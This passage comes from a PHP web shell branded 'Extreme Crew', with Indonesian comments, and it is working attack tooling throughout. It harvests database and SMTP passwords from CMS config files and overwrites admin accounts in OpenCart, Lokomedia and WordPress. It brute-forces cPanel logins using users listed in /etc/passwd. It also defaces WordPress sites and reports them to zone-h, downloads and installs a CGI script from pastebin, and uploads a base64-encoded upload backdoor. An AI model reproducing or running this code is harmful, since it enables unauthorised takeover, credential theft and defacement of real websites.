1161 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1162 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1163 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1164 $prefix = $dbprefix."user";
1165 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1166 $db = mysql_select_db($dbname);
1167 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1168 $result = mysql_fetch_array($q);
1169 $id = $result[user_id];
1170 $target = ambilkata($config,"HTTP_SERVER', '","'");
1171 if($target == '') {
1172 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1173 } else {
1174 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1175 }
1176 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1177 echo "Config => ".$file_conf."<br>";
1178 echo "CMS => OpenCart<br>";
1179 echo $url_target;
1180 if(!$update OR !$conn OR !$db) {
1181 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1182 } else {
1183 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1184 }
1185 mysql_close($conn);
1186 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1187 $dbhost = ambilkata($config,'server = "','"');
1188 $dbuser = ambilkata($config,'username = "','"');
1189 $dbpass = ambilkata($config,'password = "','"');
1190 $dbname = ambilkata($config,'database = "','"');
1191 $prefix = "users";
1192 $option = "identitas";
1193 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1194 $db = mysql_select_db($dbname);
1195 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1196 $result = mysql_fetch_array($q);
1197 $target = $result[alamat_website];
1198 if($target == '') {
1199 $target2 = $result[url];
1200 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1201 if($target2 == '') {
1202 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1203 } else {
1204 $cek_login3 = file_get_contents("$target2/adminweb/");
1205 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1206 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1207 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1208 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1209 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1210 } else {
1211 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1212 }
1213 }
1214 } else {
1215 $cek_login = file_get_contents("$target/adminweb/");
1216 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1217 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1218 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1219 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1220 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1221 } else {
1222 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1223 }
1224 }
1225 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1226 echo "Config => ".$file_conf."<br>";
1227 echo "CMS => Lokomedia<br>";
1228 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1229 echo $url_target2;
1230 } else {
1231 echo $url_target;
1232 }
1233 if(!$update OR !$conn OR !$db) {
1234 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1235 } else {
1236 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1237 }
1238 mysql_close($conn);
1239 }
1240 }
1241 }
1242 } else {
1243 echo "<center>
1244 <h1>Auto Edit User Config</h1>
1245 <form method='post'>
1246 DIR Config: <br>
1247 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1248 Set User & Pass: <br>
1249 <input type='text' name='user_baru' value='Extreme Crew' placeholder='user_baru'><br>
1250 <input type='text' name='pass_baru' value='Extreme Crew' placeholder='pass_baru'><br>
1251 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1252 </form>
1253 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1254 ";
1255 }
1256} elseif($_GET['do'] == 'cpanel') {
1257 if($_POST['crack']) {
1258 $usercp = explode("\r\n", $_POST['user_cp']);
1259 $passcp = explode("\r\n", $_POST['pass_cp']);
1260 $i = 0;
1261 foreach($usercp as $ucp) {
1262 foreach($passcp as $pcp) {
1263 if(@mysql_connect('localhost', $ucp, $pcp)) {
1264 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1265 } else {
1266 $_SESSION[$ucp] = "1";
1267 $_SESSION[$pcp] = "1";
1268 if($ucp == '' || $pcp == '') {
1269
1270 } else {
1271 $i++;
1272 if(function_exists('posix_getpwuid')) {
1273 $domain_cp = file_get_contents("/etc/named.conf");
1274 if($domain_cp == '') {
1275 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1276 } else {
1277 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1278 foreach($domains_cp[1] as $dj) {
1279 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1280 $user_cp_url = $user_cp_url['name'];
1281 if($user_cp_url == $ucp) {
1282 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1283 break;
1284 }
1285 }
1286 }
1287 } else {
1288 $dom = "<font color=red>function is Disable by system</font>";
1289 }
1290 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1291 }
1292 }
1293 }
1294 }
1295 }
1296 if($i == 0) {
1297 } else {
1298 echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Extreme Crew.</font>";
1299 }
1300 } else {
1301 echo "<center>
1302 <form method='post'>
1303 USER: <br>
1304 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1305 $_usercp = fopen("/etc/passwd","r");
1306 while($getu = fgets($_usercp)) {
1307 if($getu == '' || !$_usercp) {
1308 echo "<font color=red>Can't read /etc/passwd</font>";
1309 } else {
1310 preg_match_all("/(.*?):x:/", $getu, $u);
1311 foreach($u[1] as $user_cp) {
1312 if(is_dir("/home/$user_cp/public_html")) {
1313 echo "$user_cp\n";
1314 }
1315 }
1316 }
1317 }
1318 echo "</textarea><br>
1319 PASS: <br>
1320 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1321 function cp_pass($dir) {
1322 $pass = "";
1323 $dira = scandir($dir);
1324 foreach($dira as $dirb) {
1325 if(!is_file("$dir/$dirb")) continue;
1326 $ambil = file_get_contents("$dir/$dirb");
1327 if(preg_match("/WordPress/", $ambil)) {
1328 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1329 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1330 $pass .= ambilkata($ambil,"password = '","'")."\n";
1331 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1332 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1333 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1334 $pass .= ambilkata($ambil,'password = "','"')."\n";
1335 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1336 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1337 } elseif(preg_match("/^[client]$/", $ambil)) {
1338 preg_match("/password=(.*?)/", $ambil, $pass1);
1339 if(preg_match('/"/', $pass1[1])) {
1340 $pass1[1] = str_replace('"', "", $pass1[1]);
1341 $pass .= $pass1[1]."\n";
1342 } else {
1343 $pass .= $pass1[1]."\n";
1344 }
1345 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1346 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1347 }
1348 }
1349 echo $pass;
1350 }
1351 $cp_pass = cp_pass($dir);
1352 echo $cp_pass;
1353 echo "</textarea><br>
1354 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1355 </form>
1356 <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1357 }
1358} elseif($_GET['do'] == 'smtp') {
1359 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1360 function scj($dir) {
1361 $dira = scandir($dir);
1362 foreach($dira as $dirb) {
1363 if(!is_file("$dir/$dirb")) continue;
1364 $ambil = file_get_contents("$dir/$dirb");
1365 $ambil = str_replace("$", "", $ambil);
1366 if(preg_match("/JConfig|joomla/", $ambil)) {
1367 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1368 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1369 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1370 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1371 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1372 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1373 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1374 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1375 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1376 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1377 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1378 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1379 }
1380 }
1381 }
1382 $smpt_hunter = scj($dir);
1383 echo $smpt_hunter;
1384} elseif($_GET['do'] == 'auto_wp') {
1385 if($_POST['hajar']) {
1386 $title = htmlspecialchars($_POST['new_title']);
1387 $pn_title = str_replace(" ", "-", $title);
1388 if($_POST['cek_edit'] == "Y") {
1389 $script = $_POST['edit_content'];
1390 } else {
1391 $script = $title;
1392 }
1393 $conf = $_POST['config_dir'];
1394 $scan_conf = scandir($conf);
1395 foreach($scan_conf as $file_conf) {
1396 if(!is_file("$conf/$file_conf")) continue;
1397 $config = file_get_contents("$conf/$file_conf");
1398 if(preg_match("/WordPress/", $config)) {
1399 $dbhost = ambilkata($config,"DB_HOST', '","'");
1400 $dbuser = ambilkata($config,"DB_USER', '","'");
1401 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1402 $dbname = ambilkata($config,"DB_NAME', '","'");
1403 $dbprefix = ambilkata($config,"table_prefix = '","'");
1404 $prefix = $dbprefix."posts";
1405 $option = $dbprefix."options";
1406 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1407 $db = mysql_select_db($dbname);
1408 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1409 $result = mysql_fetch_array($q);
1410 $id = $result[ID];
1411 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1412 $result2 = mysql_fetch_array($q2);
1413 $target = $result2[option_value];
1414 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1415 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1416 echo "<div style='margin: 5px auto;'>";
1417 if($target == '') {
1418 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1419 } else {
1420 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1421 }
1422 if(!$update OR !$conn OR !$db) {
1423 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1424 } else {
1425 echo "<font color=lime>sukses di ganti.</font><br>";
1426 }
1427 echo "</div>";
1428 mysql_close($conn);
1429 }
1430 }
1431 } else {
1432 echo "<center>
1433 <h1>Auto Edit Title+Content WordPress</h1>
1434 <form method='post'>
1435 DIR Config: <br>
1436 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1437 Set Title: <br>
1438 <input type='text' name='new_title' value='Hacked by Extreme Crew' placeholder='New Title'><br><br>
1439 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1440 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1441 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1442 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1443 </form>
1444 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1445 ";
1446 }
1447} elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1448} elseif($_GET['do'] == 'zoneh') {
1449 if($_POST['submit']) {
1450 $domain = explode("\r\n", $_POST['url']);
1451 $nick = $_POST['nick'];
1452 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1453 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1454 function zoneh($url,$nick) {
1455 $ch = curl_init("http://www.zone-h.com/notify/single");
1456 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1457 curl_setopt($ch, CURLOPT_POST, true);
1458 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1459 return curl_exec($ch);
1460 curl_close($ch);
1461 }
1462 foreach($domain as $url) {
1463 $zoneh = zoneh($url,$nick);
1464 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1465 echo "$url -> <font color=lime>OK</font><br>";
1466 } else {
1467 echo "$url -> <font color=red>ERROR</font><br>";
1468 }
1469 }
1470 } else {
1471 echo "<center><form method='post'>
1472 <u>Defacer</u>: <br>
1473 <input type='text' name='nick' size='50' value='Extreme Crew'><br>
1474 <u>Domains</u>: <br>
1475 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1476 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1477 </form>";
1478 }
1479 echo "</center>";
1480} elseif($_GET['do'] == 'cgi') {
1481 $cgi_dir = mkdir('ec_cgi', 0755);
1482 $file_cgi = "ec_cgi/cgi.izo";
1483 $isi_htcgi = "AddHandler cgi-script .izo";
1484 $htcgi = fopen(".htaccess", "w");
1485 $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1486 $cgi = fopen($file_cgi, "w");
1487 fwrite($cgi, $cgi_script);
1488 fwrite($htcgi, $isi_htcgi);
1489 chmod($file_cgi, 0755);
1490 echo "<iframe src='ec_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1491} elseif($_GET['do'] == 'fake_root') {
1492 ob_start();
1493 $cwd = getcwd();
1494 $ambil_user = explode("/", $cwd);
1495 $user = $ambil_user[2];
1496 if($_POST['reverse']) {
1497 $site = explode("\r\n", $_POST['url']);
1498 $file = $_POST['file'];
1499 foreach($site as $url) {
1500 $cek = getsource("$url/~$user/$file");
1501 if(preg_match("/hacked/i", $cek)) {
1502 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1503 }
1504 }
1505 } else {
1506 echo "<center><form method='post'>
1507 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1508 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1509 Domain: <br>
1510 <textarea style='width: 450px; height: 250px;' name='url'>";
1511 reverse($_SERVER['HTTP_HOST']);
1512 echo "</textarea><br>
1513 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1514 </form><br>
1515 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1516 }
1517} elseif($_GET['do'] == 'adminer') {
1518 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1519 function adminer($url, $isi) {
1520 $fp = fopen($isi, "w");
1521 $ch = curl_init();
1522 curl_setopt($ch, CURLOPT_URL, $url);
1523 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1524 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1525 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1526 curl_setopt($ch, CURLOPT_FILE, $fp);
1527 return curl_exec($ch);
1528 curl_close($ch);
1529 fclose($fp);
1530 ob_flush();
1531 flush();
1532 }
1533 if(file_exists('adminer.php')) {
1534 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1535 } else {
1536 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1537 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1538 } else {
1539 echo "<center><font color=red>gagal buat file adminer</font></center>";
1540 }
1541 }
1542} elseif($_GET['do'] == 'auto_dwp') {
1543 if($_POST['auto_deface_wp']) {
1544 function anucurl($sites) {
1545 $ch = curl_init($sites);
1546 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1547 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1548 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1549 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1550 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1551 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1552 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1553 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1554 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1555 $data = curl_exec($ch);
1556 curl_close($ch);
1557 return $data;
1558 }
1559 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1560 $post = array(
1561 "log" => "$userr",
1562 "pwd" => "$pass",
1563 "rememberme" => "forever",
1564 "wp-submit" => "$wp_submit",
1565 "redirect_to" => "$web",
1566 "testcookie" => "1",
1567 );
1568 $ch = curl_init($cek);
1569 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1570 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1571 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1572 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1573 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1574 curl_setopt($ch, CURLOPT_POST, 1);
1575 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1576 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1577 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1578 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1579 $data = curl_exec($ch);
1580 curl_close($ch);
1581 return $data;
1582 }
1583 $scan = $_POST['link_config'];
1584 $link_config = scandir($scan);
1585 $script = htmlspecialchars($_POST['script']);
1586 $user = "Extreme Crew";
1587 $pass = "Extreme Crew";
1588 $passx = md5($pass);
1589 foreach($link_config as $dir_config) {
1590 if(!is_file("$scan/$dir_config")) continue;
1591 $config = file_get_contents("$scan/$dir_config");
1592 if(preg_match("/WordPress/", $config)) {
1593 $dbhost = ambilkata($config,"DB_HOST', '","'");
1594 $dbuser = ambilkata($config,"DB_USER', '","'");
1595 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1596 $dbname = ambilkata($config,"DB_NAME', '","'");
1597 $dbprefix = ambilkata($config,"table_prefix = '","'");
1598 $prefix = $dbprefix."users";
1599 $option = $dbprefix."options";
1600 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1601 $db = mysql_select_db($dbname);
1602 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1603 $result = mysql_fetch_array($q);
1604 $id = $result[ID];
1605 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1606 $result2 = mysql_fetch_array($q2);
1607 $target = $result2[option_value];
1608 if($target == '') {
1609 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1610 } else {
1611 echo "[+] $target <br>";
1612 }
1613 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1614 if(!$conn OR !$db OR !$update) {
1615 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1616 mysql_close($conn);
1617 } else {
1618 $site = "$target/wp-login.php";
1619 $site2 = "$target/wp-admin/theme-install.php?upload";
1620 $b1 = anucurl($site2);
1621 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1622 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1623 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1624 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1625 $www = "m.php";
1626 $fp5 = fopen($www,"w");
1627 fputs($fp5,$upload3);
1628 $post2 = array(
1629 "_wpnonce" => "$anu2",
1630 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1631 "themezip" => "@$www",
1632 "install-theme-submit" => "Install Now",
1633 );
1634 $ch = curl_init("$target/wp-admin/update.php?cr0tz&action=upload-theme");
1635 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1636 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1637 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1638 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1639 curl_setopt($ch, CURLOPT_POST, 1);
1640 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1641 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1642 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1643 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1644 $data3 = curl_exec($ch);
1645 curl_close($ch);
1646 $y = date("Y");
1647 $m = date("m");
1648 $namafile = "id.php";
1649 $fpi = fopen($namafile,"w");
1650 fputs($fpi,$script);
1651 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1652 curl_setopt($ch6, CURLOPT_POST, true);
1653 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1654 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1655 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1656 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1657 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1658 $postResult = curl_exec($ch6);
1659 curl_close($ch6);
1660 $as = "$target/k.php";
1661 $bs = anucurl($as);
1662 if(preg_match("#$script#is", $bs)) {
1663 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1664 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1665 } else {
1666 echo "[-] <font color='red'>gagal mepes...</font><br>";
1667 echo "[!!] coba aja manual: <br>";
1668 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1669 echo "[+] username: <font color=lime>$user</font><br>";
1670 echo "[+] password: <font color=lime>$pass</font><br><br>";
1671 }
1672 mysql_close($conn);
1673 }
1674 }
1675 }
1676 } else {
1677 echo "<center><h1>WordPress Auto Deface</h1>
1678 <form method='post'>
1679 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1680 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1681 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1682 </form>
1683 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1684 </center>";
1685 }
1686} elseif($_GET['do'] == 'auto_dwp2') {
1687 if($_POST['auto_deface_wp']) {
1688 function anucurl($sites) {
1689 $ch = curl_init($sites);
1690 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1691 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1692 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1693 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1694 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1695 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1696 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1697 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1698 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1699 $data = curl_exec($ch);
1700 curl_close($ch);
1701 return $data;
1702 }
1703 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1704 $post = array(
1705 "log" => "$userr",
1706 "pwd" => "$pass",
1707 "rememberme" => "forever",
1708 "wp-submit" => "$wp_submit",
1709 "redirect_to" => "$web",
1710 "testcookie" => "1",
1711 );
1712 $ch = curl_init($cek);
1713 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1714 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1715 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1716 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1717 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1718 curl_setopt($ch, CURLOPT_POST, 1);
1719 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1720 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1721 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1722 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1723 $data = curl_exec($ch);
1724 curl_close($ch);
1725 return $data;
1726 }
1727 $link = explode("\r\n", $_POST['link']);
1728 $script = htmlspecialchars($_POST['script']);
1729 $user = "Extreme Crew";
1730 $pass = "Extreme Crew";
1731 $passx = md5($pass);
1732 foreach($link as $dir_config) {
1733 $config = anucurl($dir_config);
1734 $dbhost = ambilkata($config,"DB_HOST', '","'");
1735 $dbuser = ambilkata($config,"DB_USER', '","'");
1736 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1737 $dbname = ambilkata($config,"DB_NAME', '","'");
1738 $dbprefix = ambilkata($config,"table_prefix = '","'");
1739 $prefix = $dbprefix."users";
1740 $option = $dbprefix."options";
1741 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1742 $db = mysql_select_db($dbname);
1743 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1744 $result = mysql_fetch_array($q);
1745 $id = $result[ID];
1746 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1747 $result2 = mysql_fetch_array($q2);
1748 $target = $result2[option_value];
1749 if($target == '') {
1750 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1751 } else {
1752 echo "[+] $target <br>";
1753 }
1754 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1755 if(!$conn OR !$db OR !$update) {
1756 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1757 mysql_close($conn);
1758 } else {
1759 $site = "$target/wp-login.php";
1760 $site2 = "$target/wp-admin/theme-install.php?upload";
1761 $b1 = anucurl($site2);
1762 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1763 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1764 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
